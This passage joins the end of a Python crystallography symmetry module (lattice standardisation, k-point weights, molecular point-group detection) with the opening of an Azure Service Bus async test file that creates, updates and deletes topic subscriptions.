transf[1][t[1]] = 1
transf[2][t[2]] = 1
a, b, c = landang[0]
alpha = math.pi * landang[1][0] / 180
new_matrix = [[a, 0, 0],
[0, b, 0],
[0, c * cos(alpha), c * sin(alpha)]]
if new_matrix is None:
# this if is to treat the case
# where alpha==90 (but we still have a monoclinic sg
new_matrix = [[sorted_lengths[0], 0, 0],
[0, sorted_lengths[1], 0],
[0, 0, sorted_lengths[2]]]
transf = np.zeros(shape=(3, 3))
for c in range(len(sorted_dic)):
transf[c][sorted_dic[c]['orig_index']] = 1
if international_monoclinic:
# The above code makes alpha the non-right angle.
# The following will convert to proper international convention
# that beta is the non-right angle.
op = [[0, 1, 0], [1, 0, 0], [0, 0, -1]]
transf = np.dot(op, transf)
new_matrix = np.dot(op, new_matrix)
beta = Lattice(new_matrix).beta
if beta < 90:
op = [[-1, 0, 0], [0, -1, 0], [0, 0, 1]]
transf = np.dot(op, transf)
new_matrix = np.dot(op, new_matrix)
latt = Lattice(new_matrix)
elif latt_type == "triclinic":
#we use a LLL Minkowski-like reduction for the triclinic cells
struct = struct.get_reduced_structure("LLL")
a, b, c = latt.lengths_and_angles[0]
alpha, beta, gamma = [math.pi * i / 180
for i in latt.lengths_and_angles[1]]
new_matrix = None
test_matrix = [[a, 0, 0],
[b * cos(gamma), b * sin(gamma), 0.0],
[c * cos(beta),
c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
def is_all_acute_or_obtuse(m):
recp_angles = np.array(Lattice(m).reciprocal_lattice.angles)
return np.all(recp_angles <= 90) or np.all(recp_angles > 90)
if is_all_acute_or_obtuse(test_matrix):
transf = np.eye(3)
new_matrix = test_matrix
test_matrix = [[-a, 0, 0],
[b * cos(gamma), b * sin(gamma), 0.0],
[-c * cos(beta),
-c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
-c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
if is_all_acute_or_obtuse(test_matrix):
transf = [[-1, 0, 0],
[0, 1, 0],
[0, 0, -1]]
new_matrix = test_matrix
test_matrix = [[-a, 0, 0],
[-b * cos(gamma), -b * sin(gamma), 0.0],
[c * cos(beta),
c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
if is_all_acute_or_obtuse(test_matrix):
transf = [[-1, 0, 0],
[0, -1, 0],
[0, 0, 1]]
new_matrix = test_matrix
test_matrix = [[a, 0, 0],
[-b * cos(gamma), -b * sin(gamma), 0.0],
[-c * cos(beta),
-c * (cos(alpha) - cos(beta) * cos(gamma)) /
sin(gamma),
-c * math.sqrt(sin(gamma) ** 2 - cos(alpha) ** 2
- cos(beta) ** 2
+ 2 * cos(alpha) * cos(beta)
* cos(gamma)) / sin(gamma)]]
if is_all_acute_or_obtuse(test_matrix):
transf = [[1, 0, 0],
[0, -1, 0],
[0, 0, -1]]
new_matrix = test_matrix
latt = Lattice(new_matrix)
new_coords = np.dot(transf, np.transpose(struct.frac_coords)).T
new_struct = Structure(latt, struct.species_and_occu, new_coords,
site_properties=struct.site_properties,
to_unit_cell=True)
return new_struct.get_sorted_structure()
def get_kpoint_weights(self, kpoints, atol=1e-5):
"""
Calculate the weights for a list of kpoints.
Args:
kpoints (Sequence): Sequence of kpoints. np.arrays is fine. Note
that the code does not check that the list of kpoints
provided does not contain duplicates.
atol (float): Tolerance for fractional coordinates comparisons.
Returns:
List of weights, in the SAME order as kpoints.
"""
kpts = np.array(kpoints)
shift = []
mesh = []
for i in range(3):
nonzero = [i for i in kpts[:, i] if abs(i) > 1e-5]
if len(nonzero) != len(kpts):
# gamma centered
if not nonzero:
mesh.append(1)
else:
m = np.abs(np.round(1/np.array(nonzero)))
mesh.append(int(max(m)))
shift.append(0)
else:
# Monk
m = np.abs(np.round(0.5/np.array(nonzero)))
mesh.append(int(max(m)))
shift.append(1)
mapping, grid = spglib.get_ir_reciprocal_mesh(
np.array(mesh), self._cell, is_shift=shift, symprec=self._symprec)
mapping = list(mapping)
grid = (np.array(grid) + np.array(shift) * (0.5, 0.5, 0.5)) / mesh
weights = []
mapped = defaultdict(int)
for k in kpoints:
for i, g in enumerate(grid):
if np.allclose(pbc_diff(k, g), (0, 0, 0), atol=atol):
mapped[tuple(g)] += 1
weights.append(mapping.count(mapping[i]))
break
if (len(mapped) != len(set(mapping))) or (
not all([v == 1 for v in mapped.values()])):
raise ValueError("Unable to find 1:1 corresponding between input "
"kpoints and irreducible grid!")
return [w/sum(weights) for w in weights]
class PointGroupAnalyzer(object):
"""
A class to analyze the point group of a molecule. The general outline of
the algorithm is as follows:
1. Center the molecule around its center of mass.
2. Compute the inertia tensor and the eigenvalues and eigenvectors.
3. Handle the symmetry detection based on eigenvalues.
a. Linear molecules have one zero eigenvalue. Possible symmetry
operations are C*v or D*v
b. Asymetric top molecules have all different eigenvalues. The
maximum rotational symmetry in such molecules is 2
c. Symmetric top molecules have 1 unique eigenvalue, which gives a
unique rotation axis. All axial point groups are possible
except the cubic groups (T & O) and I.
d. Spherical top molecules have all three eigenvalues equal. They
have the rare T, O or I point groups.
.. attribute:: sch_symbol
Schoenflies symbol of the detected point group.
"""
inversion_op = SymmOp.inversion()
def __init__(self, mol, tolerance=0.3, eigen_tolerance=0.01,
matrix_tol=0.1):
"""
The default settings are usually sufficient.
Args:
mol (Molecule): Molecule to determine point group for.
tolerance (float): Distance tolerance to consider sites as
symmetrically equivalent. Defaults to 0.3 Angstrom.
eigen_tolerance (float): Tolerance to compare eigen values of
the inertia tensor. Defaults to 0.01.
matrix_tol (float): Tolerance used to generate the full set of
symmetry operations of the point group.
"""
self.mol = mol
self.centered_mol = mol.get_centered_molecule()
self.tol = tolerance
self.eig_tol = eigen_tolerance
self.mat_tol = matrix_tol
self._analyze()
if self.sch_symbol in ["C1v", "C1h"]:
self.sch_symbol = "Cs"
def _analyze(self):
if len(self.centered_mol) == 1:
self.sch_symbol = "Kh"
else:
inertia_tensor = np.zeros((3, 3))
total_inertia = 0
for site in self.centered_mol:
c = site.coords
wt = site.species_and_occu.weight
for i in range(3):
inertia_tensor[i, i] += wt * (c[(i + 1) % 3] ** 2
+ c[(i + 2) % 3] ** 2)
for i, j in [(0, 1), (1, 2), (0, 2)]:
inertia_tensor[i, j] += -wt * c[i] * c[j]
inertia_tensor[j, i] += -wt * c[j] * c[i]
total_inertia += wt * np.dot(c, c)
# Normalize the inertia tensor so that it does not scale with size
# of the system. This mitigates the problem of choosing a proper
# comparison tolerance for the eigenvalues.
inertia_tensor /= total_inertia
eigvals, eigvecs = np.linalg.eig(inertia_tensor)
self.principal_axes = eigvecs.T
self.eigvals = eigvals
v1, v2, v3 = eigvals
eig_zero = abs(v1 * v2 * v3) < self.eig_tol ** 3
eig_all_same = abs(v1 - v2) < self.eig_tol and abs(
v1 - v3) < self.eig_tol
eig_all_diff = abs(v1 - v2) > self.eig_tol and abs(
v1 - v3) > self.eig_tol and abs(v2 - v3) > self.eig_tol
self.rot_sym = []
self.symmops = [SymmOp(np.eye(4))]
if eig_zero:
logger.debug("Linear molecule detected")
self._proc_linear()
elif eig_all_same:
logger.debug("Spherical top molecule detected")
self._proc_sph_top()
elif eig_all_diff:
logger.debug("Asymmetric top molecule detected")
self._proc_asym_top()
else:
logger.debug("Symmetric top molecule detected")
self._proc_sym_top()
def _proc_linear(self):
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.sch_symbol = "D*h"
self.symmops.append(PointGroupAnalyzer.inversion_op)
else:
self.sch_symbol = "C*v"
def _proc_asym_top(self):
"""
Handles assymetric top molecules, which cannot contain rotational
symmetry larger than 2.
"""
self._check_R2_axes_asym()
if len(self.rot_sym) == 0:
logger.debug("No rotation symmetries detected.")
self._proc_no_rot_sym()
elif len(self.rot_sym) == 3:
logger.debug("Dihedral group detected.")
self._proc_dihedral()
else:
logger.debug("Cyclic group detected.")
self._proc_cyclic()
def _proc_sym_top(self):
"""
Handles symetric top molecules which has one unique eigenvalue whose
corresponding principal axis is a unique rotational axis. More complex
handling required to look for R2 axes perpendicular to this unique
axis.
"""
if abs(self.eigvals[0] - self.eigvals[1]) < self.eig_tol:
ind = 2
elif abs(self.eigvals[1] - self.eigvals[2]) < self.eig_tol:
ind = 0
else:
ind = 1
logger.debug("Eigenvalues = %s." % self.eigvals)
unique_axis = self.principal_axes[ind]
self._check_rot_sym(unique_axis)
logger.debug("Rotation symmetries = %s" % self.rot_sym)
if len(self.rot_sym) > 0:
self._check_perpendicular_r2_axis(unique_axis)
if len(self.rot_sym) >= 2:
self._proc_dihedral()
elif len(self.rot_sym) == 1:
self._proc_cyclic()
else:
self._proc_no_rot_sym()
def _proc_no_rot_sym(self):
"""
Handles molecules with no rotational symmetry. Only possible point
groups are C1, Cs and Ci.
"""
self.sch_symbol = "C1"
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.sch_symbol = "Ci"
self.symmops.append(PointGroupAnalyzer.inversion_op)
else:
for v in self.principal_axes:
mirror_type = self._find_mirror(v)
if not mirror_type == "":
self.sch_symbol = "Cs"
break
def _proc_cyclic(self):
"""
Handles cyclic group molecules.
"""
main_axis, rot = max(self.rot_sym, key=lambda v: v[1])
self.sch_symbol = "C{}".format(rot)
mirror_type = self._find_mirror(main_axis)
if mirror_type == "h":
self.sch_symbol += "h"
elif mirror_type == "v":
self.sch_symbol += "v"
elif mirror_type == "":
if self.is_valid_op(SymmOp.rotoreflection(main_axis,
angle=180 / rot)):
self.sch_symbol = "S{}".format(2 * rot)
def _proc_dihedral(self):
"""
Handles dihedral group molecules, i.e those with intersecting R2 axes
and a main axis.
"""
main_axis, rot = max(self.rot_sym, key=lambda v: v[1])
self.sch_symbol = "D{}".format(rot)
mirror_type = self._find_mirror(main_axis)
if mirror_type == "h":
self.sch_symbol += "h"
elif not mirror_type == "":
self.sch_symbol += "d"
def _check_R2_axes_asym(self):
"""
Test for 2-fold rotation along the principal axes. Used to handle
asymetric top molecules.
"""
for v in self.principal_axes:
op = SymmOp.from_axis_angle_and_translation(v, 180)
if self.is_valid_op(op):
self.symmops.append(op)
self.rot_sym.append((v, 2))
def _find_mirror(self, axis):
"""
Looks for mirror symmetry of specified type about axis. Possible
types are "h" or "vd". Horizontal (h) mirrors are perpendicular to
the axis while vertical (v) or diagonal (d) mirrors are parallel. v
mirrors has atoms lying on the mirror plane while d mirrors do
not.
"""
mirror_type = ""
# First test whether the axis itself is the normal to a mirror plane.
if self.is_valid_op(SymmOp.reflection(axis)):
self.symmops.append(SymmOp.reflection(axis))
mirror_type = "h"
else:
# Iterate through all pairs of atoms to find mirror
for s1, s2 in itertools.combinations(self.centered_mol, 2):
if s1.species_and_occu == s2.species_and_occu:
normal = s1.coords - s2.coords
if np.dot(normal, axis) < self.tol:
op = SymmOp.reflection(normal)
if self.is_valid_op(op):
self.symmops.append(op)
if len(self.rot_sym) > 1:
mirror_type = "d"
for v, r in self.rot_sym:
if not np.linalg.norm(v - axis) < self.tol:
if np.dot(v, normal) < self.tol:
mirror_type = "v"
break
else:
mirror_type = "v"
break
return mirror_type
def _get_smallest_set_not_on_axis(self, axis):
"""
Returns the smallest list of atoms with the same species and
distance from origin AND does not lie on the specified axis. This
maximal set limits the possible rotational symmetry operations,
since atoms lying on a test axis is irrelevant in testing rotational
symmetryOperations.
"""
def not_on_axis(site):
v = np.cross(site.coords, axis)
return np.linalg.norm(v) > self.tol
valid_sets = []
origin_site, dist_el_sites = cluster_sites(self.centered_mol, self.tol)
for test_set in dist_el_sites.values():
valid_set = list(filter(not_on_axis, test_set))
if len(valid_set) > 0:
valid_sets.append(valid_set)
return min(valid_sets, key=lambda s: len(s))
def _check_rot_sym(self, axis):
"""
Determines the rotational symmetry about supplied axis. Used only for
symmetric top molecules which has possible rotational symmetry
operations > 2.
"""
min_set = self._get_smallest_set_not_on_axis(axis)
max_sym = len(min_set)
for i in range(max_sym, 0, -1):
if max_sym % i != 0:
continue
op = SymmOp.from_axis_angle_and_translation(axis, 360 / i)
rotvalid = self.is_valid_op(op)
if rotvalid:
self.symmops.append(op)
self.rot_sym.append((axis, i))
return i
return 1
def _check_perpendicular_r2_axis(self, axis):
"""
Checks for R2 axes perpendicular to unique axis. For handling
symmetric top molecules.
"""
min_set = self._get_smallest_set_not_on_axis(axis)
for s1, s2 in itertools.combinations(min_set, 2):
test_axis = np.cross(s1.coords - s2.coords, axis)
if np.linalg.norm(test_axis) > self.tol:
op = SymmOp.from_axis_angle_and_translation(test_axis, 180)
r2present = self.is_valid_op(op)
if r2present:
self.symmops.append(op)
self.rot_sym.append((test_axis, 2))
return True
def _proc_sph_top(self):
"""
Handles Sperhical Top Molecules, which belongs to the T, O or I point
groups.
"""
self._find_spherical_axes()
if len(self.rot_sym) == 0:
logger.debug("Accidental speherical top!")
self._proc_sym_top()
main_axis, rot = max(self.rot_sym, key=lambda v: v[1])
if rot < 3:
logger.debug("Accidental speherical top!")
self._proc_sym_top()
elif rot == 3:
mirror_type = self._find_mirror(main_axis)
if mirror_type != "":
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.symmops.append(PointGroupAnalyzer.inversion_op)
self.sch_symbol = "Th"
else:
self.sch_symbol = "Td"
else:
self.sch_symbol = "T"
elif rot == 4:
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.symmops.append(PointGroupAnalyzer.inversion_op)
self.sch_symbol = "Oh"
else:
self.sch_symbol = "O"
elif rot == 5:
if self.is_valid_op(PointGroupAnalyzer.inversion_op):
self.symmops.append(PointGroupAnalyzer.inversion_op)
self.sch_symbol = "Ih"
else:
self.sch_symbol = "I"
def _find_spherical_axes(self):
"""
Looks for R5, R4, R3 and R2 axes in spherical top molecules. Point
group T molecules have only one unique 3-fold and one unique 2-fold
axis. O molecules have one unique 4, 3 and 2-fold axes. I molecules
have a unique 5-fold axis.
"""
rot_present = defaultdict(bool)
origin_site, dist_el_sites = cluster_sites(self.centered_mol, self.tol)
test_set = min(dist_el_sites.values(), key=lambda s: len(s))
coords = [s.coords for s in test_set]
for c1, c2, c3 in itertools.combinations(coords, 3):
for cc1, cc2 in itertools.combinations([c1, c2, c3], 2):
if not rot_present[2]:
test_axis = cc1 + cc2
if np.linalg.norm(test_axis) > self.tol:
op = SymmOp.from_axis_angle_and_translation(test_axis,
180)
rot_present[2] = self.is_valid_op(op)
if rot_present[2]:
self.symmops.append(op)
self.rot_sym.append((test_axis, 2))
test_axis = np.cross(c2 - c1, c3 - c1)
if np.linalg.norm(test_axis) > self.tol:
for r in (3, 4, 5):
if not rot_present[r]:
op = SymmOp.from_axis_angle_and_translation(
test_axis, 360 / r)
rot_present[r] = self.is_valid_op(op)
if rot_present[r]:
self.symmops.append(op)
self.rot_sym.append((test_axis, r))
break
if rot_present[2] and rot_present[3] and (
rot_present[4] or rot_present[5]):
break
def get_pointgroup(self):
"""
Returns a PointGroup object for the molecule.
"""
return PointGroupOperations(self.sch_symbol, self.symmops, self.mat_tol)
def is_valid_op(self, symmop):
"""
Check if a particular symmetry operation is a valid symmetry operation
for a molecule, i.e., the operation maps all atoms to another
equivalent atom.
Args:
symmop (SymmOp): Symmetry operation to test.
Returns:
(bool): Whether SymmOp is valid for Molecule.
"""
coords = self.centered_mol.cart_coords
for site in self.centered_mol:
coord = symmop.operate(site.coords)
ind = find_in_coord_list(coords, coord, self.tol)
if not (len(ind) == 1 and self.centered_mol[ind[0]].species_and_occu == site.species_and_occu):
return False
return True
def cluster_sites(mol, tol):
"""
Cluster sites based on distance and species type.
Args:
mol (Molecule): Molecule **with origin at center of mass**.
tol (float): Tolerance to use.
Returns:
(origin_site, clustered_sites): origin_site is a site at the center
of mass (None if there are no origin atoms). clustered_sites is a
dict of {(avg_dist, species_and_occu): [list of sites]}
"""
# Cluster works for dim > 2 data. We just add a dummy 0 for second
# coordinate.
dists = [[np.linalg.norm(site.coords), 0] for site in mol]
import scipy.cluster as spcluster
f = spcluster.hierarchy.fclusterdata(dists, tol, criterion='distance')
clustered_dists = defaultdict(list)
for i, site in enumerate(mol):
clustered_dists[f[i]].append(dists[i])
avg_dist = {label: np.mean(val) for label, val in clustered_dists.items()}
clustered_sites = defaultdict(list)
origin_site = None
for i, site in enumerate(mol):
if avg_dist[f[i]] < tol:
origin_site = site
else:
clustered_sites[(avg_dist[f[i]],
site.species_and_occu)].append(site)
return origin_site, clustered_sites
def generate_full_symmops(symmops, tol, max_recursion_depth=300):
"""
Recursive algorithm to permute through all possible combinations of the
initially supplied symmetry operations to arrive at a complete set of
operations mapping a single atom to all other equivalent atoms in the
point group. This assumes that the initial number already uniquely
identifies all operations.
Args:
symmops ([SymmOp]): Initial set of symmetry operations.
Returns:
Full set of symmetry operations.
"""
a = [o.affine_matrix for o in symmops]
if len(symmops) > max_recursion_depth:
logger.debug("Generation of symmetry operations in infinite loop. " +
"Possible error in initial operations or tolerance too "
"low.")
else:
for op1, op2 in itertools.product(symmops, symmops):
m = np.dot(op1.affine_matrix, op2.affine_matrix)
d = np.abs(a - m) < tol
if not np.any(np.all(np.all(d, axis=2), axis=1)):
return generate_full_symmops(symmops + [SymmOp(m)], tol,
max_recursion_depth)
return symmops
class SpacegroupOperations(list):
"""
Represents a space group, which is a collection of symmetry operations.
Args:
int_symbol (str): International symbol of the spacegroup.
int_number (int): International number of the spacegroup.
symmops ([SymmOp]): Symmetry operations associated with the
spacegroup.
"""
def __init__(self, int_symbol, int_number, symmops):
self.int_symbol = int_symbol
self.int_number = int_number
super(SpacegroupOperations, self).__init__(symmops)
def are_symmetrically_equivalent(self, sites1, sites2, symm_prec=1e-3):
"""
Given two sets of PeriodicSites, test if they are actually
symmetrically equivalent under this space group. Useful, for example,
if you want to test if selecting atoms 1 and 2 out of a set of 4 atoms
are symmetrically the same as selecting atoms 3 and 4, etc.
One use is in PartialRemoveSpecie transformation to return only
symmetrically distinct arrangements of atoms.
Args:
sites1 ([Site]): 1st set of sites
sites2 ([Site]): 2nd set of sites
symm_prec (float): Tolerance in atomic distance to test if atoms
are symmetrically similar.
Returns:
(bool): Whether the two sets of sites are symmetrically
equivalent.
"""
def in_sites(site):
for test_site in sites1:
if test_site.is_periodic_image(site, symm_prec, False):
return True
return False
for op in self:
newsites2 = [PeriodicSite(site.species_and_occu,
op.operate(site.frac_coords),
site.lattice) for site in sites2]
for site in newsites2:
if not in_sites(site):
break
else:
return True
return False
def __str__(self):
return "{} ({}) spacegroup".format(self.int_symbol, self.int_number)
class PointGroupOperations(list):
"""
Defines a point group, which is essentially a sequence of symmetry
operations.
Args:
sch_symbol (str): Schoenflies symbol of the point group.
operations ([SymmOp]): Initial set of symmetry operations. It is
sufficient to provide only just enough operations to generate
the full set of symmetries.
tol (float): Tolerance to generate the full set of symmetry
operations.
.. attribute:: sch_symbol
Schoenflies symbol of the point group.
"""
def __init__(self, sch_symbol, operations, tol=0.1):
self.sch_symbol = sch_symbol
super(PointGroupOperations, self).__init__(
generate_full_symmops(operations, tol))
def __str__(self):
return self.sch_symbol
def __repr__(self):
return self.__str__()
|
|
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import logging
import pytest
import datetime
import msrest
from azure.servicebus.aio.management import ServiceBusAdministrationClient
from azure.servicebus.management import SubscriptionProperties
from utilities import get_logger
from azure.core.exceptions import HttpResponseError, ResourceExistsError
from devtools_testutils import AzureMgmtTestCase, CachedResourceGroupPreparer
from servicebus_preparer import (
CachedServiceBusNamespacePreparer,
ServiceBusNamespacePreparer
)
from mgmt_test_utilities_async import async_pageable_to_list, clear_topics
_logger = get_logger(logging.DEBUG)
class ServiceBusAdministrationClientSubscriptionAsyncTests(AzureMgmtTestCase):
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_by_name(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "topic_testaddf"
subscription_name = "sub_testkkk"
try:
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name)
subscription = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription.name == subscription_name
assert subscription.availability_status == 'Available'
assert subscription.status == 'Active'
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_with_subscription_description(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "iweidk"
subscription_name = "kdosako"
subscription_name_2 = "owazmq"
try:
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(
topic_name,
subscription_name=subscription_name,
auto_delete_on_idle=datetime.timedelta(minutes=10),
dead_lettering_on_message_expiration=True,
default_message_time_to_live=datetime.timedelta(minutes=11),
enable_batched_operations=True,
lock_duration=datetime.timedelta(seconds=13),
max_delivery_count=14,
requires_session=True
)
subscription = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription.name == subscription_name
assert subscription.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription.dead_lettering_on_message_expiration == True
assert subscription.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription.enable_batched_operations == True
assert subscription.lock_duration == datetime.timedelta(seconds=13)
assert subscription.max_delivery_count == 14
assert subscription.requires_session == True
await mgmt_service.create_subscription(
topic_name,
subscription_name=subscription_name_2,
auto_delete_on_idle="PT10M",
dead_lettering_on_message_expiration=True,
default_message_time_to_live="PT11M",
enable_batched_operations=True,
lock_duration="PT13S",
max_delivery_count=14,
requires_session=True
)
subscription_2 = await mgmt_service.get_subscription(topic_name, subscription_name_2)
assert subscription_2.name == subscription_name_2
assert subscription_2.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription_2.dead_lettering_on_message_expiration == True
assert subscription_2.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription_2.enable_batched_operations == True
assert subscription_2.lock_duration == datetime.timedelta(seconds=13)
assert subscription_2.max_delivery_count == 14
assert subscription_2.requires_session == True
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_subscription(topic_name, subscription_name_2)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_with_forward_to(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "iweidkforward"
subscription_name = "kdosakoforward"
queue_name = "dkfthj"
try:
await mgmt_service.create_queue(queue_name)
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(
topic_name,
subscription_name=subscription_name,
forward_dead_lettered_messages_to=queue_name,
forward_to=queue_name,
)
subscription = await mgmt_service.get_subscription(topic_name, subscription_name)
# Test forward_to (separately, as it changes auto_delete_on_idle when you enable it.)
# Note: We endswith to avoid the fact that the servicebus_namespace_name is replacered locally but not in the properties bag, and still test this.
assert subscription.forward_to.endswith(".servicebus.windows.net/{}".format(queue_name))
assert subscription.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(queue_name))
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
await mgmt_service.delete_queue(queue_name)
mgmt_service.close()
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_create_duplicate(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "dqkodq"
subscription_name = 'kkaqo'
try:
await mgmt_service.create_topic(topic_name)
await mgmt_service.create_subscription(topic_name, subscription_name)
with pytest.raises(ResourceExistsError):
await mgmt_service.create_subscription(topic_name, subscription_name)
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_update_success(self, servicebus_namespace_connection_string, servicebus_namespace, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
await clear_topics(mgmt_service)
topic_name = "fjrui"
subscription_name = "eqkovc"
queue_name = "dfkla"
try:
await mgmt_service.create_queue(queue_name)
topic_description = await mgmt_service.create_topic(topic_name)
subscription_description = await mgmt_service.create_subscription(topic_description.name, subscription_name)
# Try updating one setting.
subscription_description.lock_duration = datetime.timedelta(minutes=2)
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_name, subscription_name)
assert subscription_description.lock_duration == datetime.timedelta(minutes=2)
# Now try updating all settings.
subscription_description.auto_delete_on_idle = datetime.timedelta(minutes=10)
subscription_description.dead_lettering_on_message_expiration = True
subscription_description.default_message_time_to_live = datetime.timedelta(minutes=11)
subscription_description.lock_duration = datetime.timedelta(seconds=12)
subscription_description.max_delivery_count = 14
# topic_description.enable_partitioning = True # Cannot be changed after creation
# topic_description.requires_session = True # Cannot be changed after creation
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=10)
assert subscription_description.dead_lettering_on_message_expiration == True
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=11)
assert subscription_description.max_delivery_count == 14
assert subscription_description.lock_duration == datetime.timedelta(seconds=12)
# assert topic_description.enable_partitioning == True
# assert topic_description.requires_session == True
# Finally, test forward_to (separately, as it changes auto_delete_on_idle when you enable it.)
subscription_description.forward_to = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
subscription_description.forward_dead_lettered_messages_to = "sb://{}.servicebus.windows.net/{}".format(servicebus_namespace.name, topic_name)
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
# Note: We endswith to avoid the fact that the servicebus_namespace_name is replacered locally but not in the properties bag, and still test this.
assert subscription_description.forward_to.endswith(".servicebus.windows.net/{}".format(topic_name))
assert subscription_description.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(topic_name))
# Update forward_to with entity name
subscription_description.forward_to = queue_name
subscription_description.forward_dead_lettered_messages_to = queue_name
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
# Note: We endswith to avoid the fact that the servicebus_namespace_name is replacered locally but not in the properties bag, and still test this.
assert subscription_description.forward_to.endswith(".servicebus.windows.net/{}".format(queue_name))
assert subscription_description.forward_dead_lettered_messages_to.endswith(".servicebus.windows.net/{}".format(queue_name))
# Update forward_to with None
subscription_description.forward_to = None
subscription_description.forward_dead_lettered_messages_to = None
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
# Note: We endswith to avoid the fact that the servicebus_namespace_name is replacered locally but not in the properties bag, and still test this.
assert subscription_description.forward_to is None
assert subscription_description.forward_dead_lettered_messages_to is None
subscription_description.auto_delete_on_idle = "PT10M1S"
subscription_description.default_message_time_to_live = "PT11M2S"
subscription_description.lock_duration = "PT3M3S"
await mgmt_service.update_subscription(topic_description.name, subscription_description)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=10, seconds=1)
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=11, seconds=2)
assert subscription_description.lock_duration == datetime.timedelta(minutes=3, seconds=3)
# updating all settings with keyword arguments.
await mgmt_service.update_subscription(
topic_description.name,
subscription_description,
auto_delete_on_idle=datetime.timedelta(minutes=15),
dead_lettering_on_message_expiration=False,
default_message_time_to_live=datetime.timedelta(minutes=16),
lock_duration=datetime.timedelta(seconds=17),
max_delivery_count=15,
forward_to=None,
forward_dead_lettered_messages_to=None
)
subscription_description = await mgmt_service.get_subscription(topic_description.name, subscription_name)
assert subscription_description.auto_delete_on_idle == datetime.timedelta(minutes=15)
assert subscription_description.dead_lettering_on_message_expiration == False
assert subscription_description.default_message_time_to_live == datetime.timedelta(minutes=16)
assert subscription_description.max_delivery_count == 15
assert subscription_description.lock_duration == datetime.timedelta(seconds=17)
assert subscription_description.forward_to == None
assert subscription_description.forward_dead_lettered_messages_to == None
finally:
await mgmt_service.delete_subscription(topic_name, subscription_name)
await mgmt_service.delete_topic(topic_name)
await mgmt_service.delete_queue(queue_name)
await mgmt_service.close()
@CachedResourceGroupPreparer(name_prefix='servicebustest')
@CachedServiceBusNamespacePreparer(name_prefix='servicebustest')
async def test_async_mgmt_subscription_update_invalid(self, servicebus_namespace_connection_string, **kwargs):
mgmt_service = ServiceBusAdministrationClient.from_connection_string(servicebus_namespace_connection_string)
